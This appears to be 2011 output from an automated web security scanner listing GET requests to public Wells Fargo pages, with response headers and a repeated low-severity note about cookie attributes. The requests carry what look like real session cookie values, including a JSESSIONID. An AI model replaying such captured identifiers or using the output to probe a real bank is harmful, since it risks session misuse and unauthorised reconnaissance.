GET /locator/atm/preSearch HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:19 GMT Content-type: text/html Cache-Control: no-cache="Set-Cookie" Location: https://www.wellsfargo.com/locator/atm/search Set-Cookie: wcmcookieloc=NGyJNJhfZkJQBpWrs3zCZbWZdbfpMmq2j01SwVrYQ028TBgjR5nW!-1273606700; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1777621770.16927.0000; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/locator ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /locator/atm/search HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:17 GMT Content-type: text/html; charset=ISO-8859-1 Cache-Control: no-cache="Set-Cookie" Set-Cookie: wcmcookieloc=mdg4NJhdq2DWYbbpdNp9BF000vJcqLG9gHCnvKSjFpn4l8Jr1tl9!898739336; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2398378762.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml:lang="en" lang="en">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mortgage/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:41 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=9VjQNJhV9tfpnq1TVd2hsJPwPGsqdkCgbFhYGJsJTrttBpTLdsjY!-705334509; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2163497738.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /mortgage/rates?dm=DMIWFHPRAT HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:43 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=fZ0GNJhXbp9NkTTBKxLLgWdBC8515ftXhHp83yTlYbMCkvhQHzFT!-1408825807; domain=.wellsfargo.com; path=/; secure Set-Cookie: dm=DMIWFHPRAT; domain=.wellsfargo.com; expires=Friday, 04-Mar-2011 22:29:43 GMT; path=/ Content-Language: en Set-Cookie: ISD_WCM_COOKIE=1693735690.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Home Mortgage - To ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /online_brokerage/education/trading/volatile/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:30:01 GMT Content-type: text/html; charset=ISO-8859-1 Set-Cookie: wcmcookiewf=C7mMNJhJpXQ7FGYBpppzvY2tZP2qr0klzqyBTrZnLhD8HsmsB5nr!-427629300; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1827953418.16927.0000; path=/ Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /per/more/banking HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:39 GMT Content-length: 10949 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=mFfWNJhTM3LCLw1nwcXCmgZQLT7M2yhK3vfsDDQBTdRL5f6czJbj!1127287699; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2431933194.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Banking Overview</ ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /per/more/loans_credit HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:40 GMT Content-length: 10611 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=LlvBNJhJC3mhJb9Rgj7RS9w1WVHnp24RLXcRh0pK5HRNch3Gxxnz!1697366244; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2096388874.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_credit/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:47 GMT Content-length: 7834 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=S850NJhbvFyXKFsqjRkSJvyZ8MVlMvnnZvZ8BtWvJdLCFxx1ZSxH!-887259216; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2566150922.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head> <title>Wells Fargo - Personal C ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_credit/rate_payments/rate_calc_main HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:48 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=TC2fNJhcJvc8bQh2DP2GHJBG108y42PYVj4VDGmL2nJ0bZdjh3Lq!854257767; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2180274954.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo ... Rate & Payment ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /privacy_security/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:31 GMT Content-length: 7654 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=5MdgNJhLPQJrJbQL2dj2np2B79whD7Gkrq9kkphmPHd9S35MYVGj!457746116; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2062834442.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Privacy & Security ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /privacy_security/fraud/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:29 GMT Content-length: 7546 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=yVv2NJhJb35jxN6JYsp0LJR40jSkyXq8BL1vVYQycy3X5yBqpGnH!-1164025042; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2633259786.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /privacy_security/fraud/report/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:27 GMT Content-length: 6368 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=vJxpNJhHLn21ThPNMCWcdb7TJvhkn1h6BwPSlv9wX4vqvRzqm8Cv!312685559; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2264161034.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Privacy and Securi ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /privacy_security/fraud/report/fraud HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:29 GMT Content-length: 5794 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=sGGJNJhJvdHFzNC5MkDQXh52s09R1dnm7LNy8v1BGT8qQTbWpMvl!-213655893; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2448710410.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Privacy and Securi ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /privacy_security/online/guarantee HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:31 GMT Content-length: 7173 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=ZWxLNJhLlFLsVdPS3Q2mcXf3Hh6RcqmGMcp1f68BhHGpyYSdLNJr!-180776916; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1811176202.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Privacy and Securi ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /products_services/HE_selector HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:58 GMT Location: https://www.wellsfargo.com/customerApp/jsp/products_services/HE_selector.jsp Set-Cookie: wcmcookiewf=Z24pNJhG811khdlryT1wFK10GQBcQnR52yn1FwnyvQyZpkwyblxT!-1966973819; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2616482570.16927.0000; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/custome ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /products_services/applications_viewall HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:59 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=pG7tNJhHLB1vQvYZNyr4dHYbT2y4l2WdqgQNVV7HxGrQqxWLchvv!-1657447489; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2348047114.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo - Apply for an Acc ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /products_services/brokerage_cklist HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:59 GMT Location: https://www.wellsfargo.com/product/apply?prodCode=WFOR-WFOR&prodSet=APP2K&language=en Set-Cookie: wcmcookiewf=yW8lNJhH2y8PV61Vj0z4DvN2vJJwb2SCmNCn6YJG9hGG1PyGcg9H!1975738457; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2197052170.16927.0000; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/product ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /products_services/deposit_cklist HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:55 GMT Location: https://www.wellsfargo.com/customerApp/app2k/PreApplyRedirect.app?productserv_cd=%2FcustomerApp%2Fjsp%2Fproducts_services%2Fdeposit_cklist Set-Cookie: wcmcookiewf=R0LSNJhDJLQdQfLnqzJygyr0Tchx3G1YHp4RQW2wNh1xkR9TB3RL!-1136720127; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1760844554.16927.0000; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/custome ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /products_services/pll_select HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:56 GMT Location: https://www.wellsfargo.com/customerApp/app2k/PreApplyRedirect.app?productserv_cd=%2FcustomerApp%2Fjsp%2Fproducts_services%2Fpll_select Set-Cookie: wcmcookiewf=ngV4NJhGD36GJv77QsGf18L1ZRq9tdksDFVdmDHvNN0R831F9g1h!-1957896322; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2482264842.16927.0000; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/custome ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rates/rates_viewall HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:59 GMT Content-length: 4031 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=DlmtNJhHwTpCxFhl7FBT67mHHMKLxbDC2y70fqHsr9QSGL2dNp8S!-569549476; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2650037002.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /savings_cds/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:36 GMT Content-length: 10180 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=9yssNJhQcHYRQwphr7KvYjH4Szhz7CLfb0yjsLmN4nqrqJT2KflR!-1077237731; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2415155978.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /savings_cds/apply HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:37 GMT Content-length: 11173 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=QXvBNJhRBz1LhBrHvvFfBbPQG6rFyxf2hyty12cJL1qHvL1yCGRS!1697366244; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2096388874.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Open a Savings Account or CD</ ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /savings_cds/cds HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:37 GMT Content-length: 11464 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=3TjSNJhR0CvRKG9J9LJwhrzLL0G7hxT2GGYTmjjJN1n923x9J3gv!-1672152970; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2331269898.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>CD Account - Find the Best CD ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /search/search HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:30:02 GMT Content-type: text/html; charset=utf-8 Cache-Control: no-cache="Set-Cookie" Set-Cookie: wcmcookiesrh=1TB6NJhKK2Z9GypBRB8QHHz19dkkKbNngWBYv9m0hsNTRY1JpPYr!191917939; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2549373706.16927.0000; path=/ Connection: close
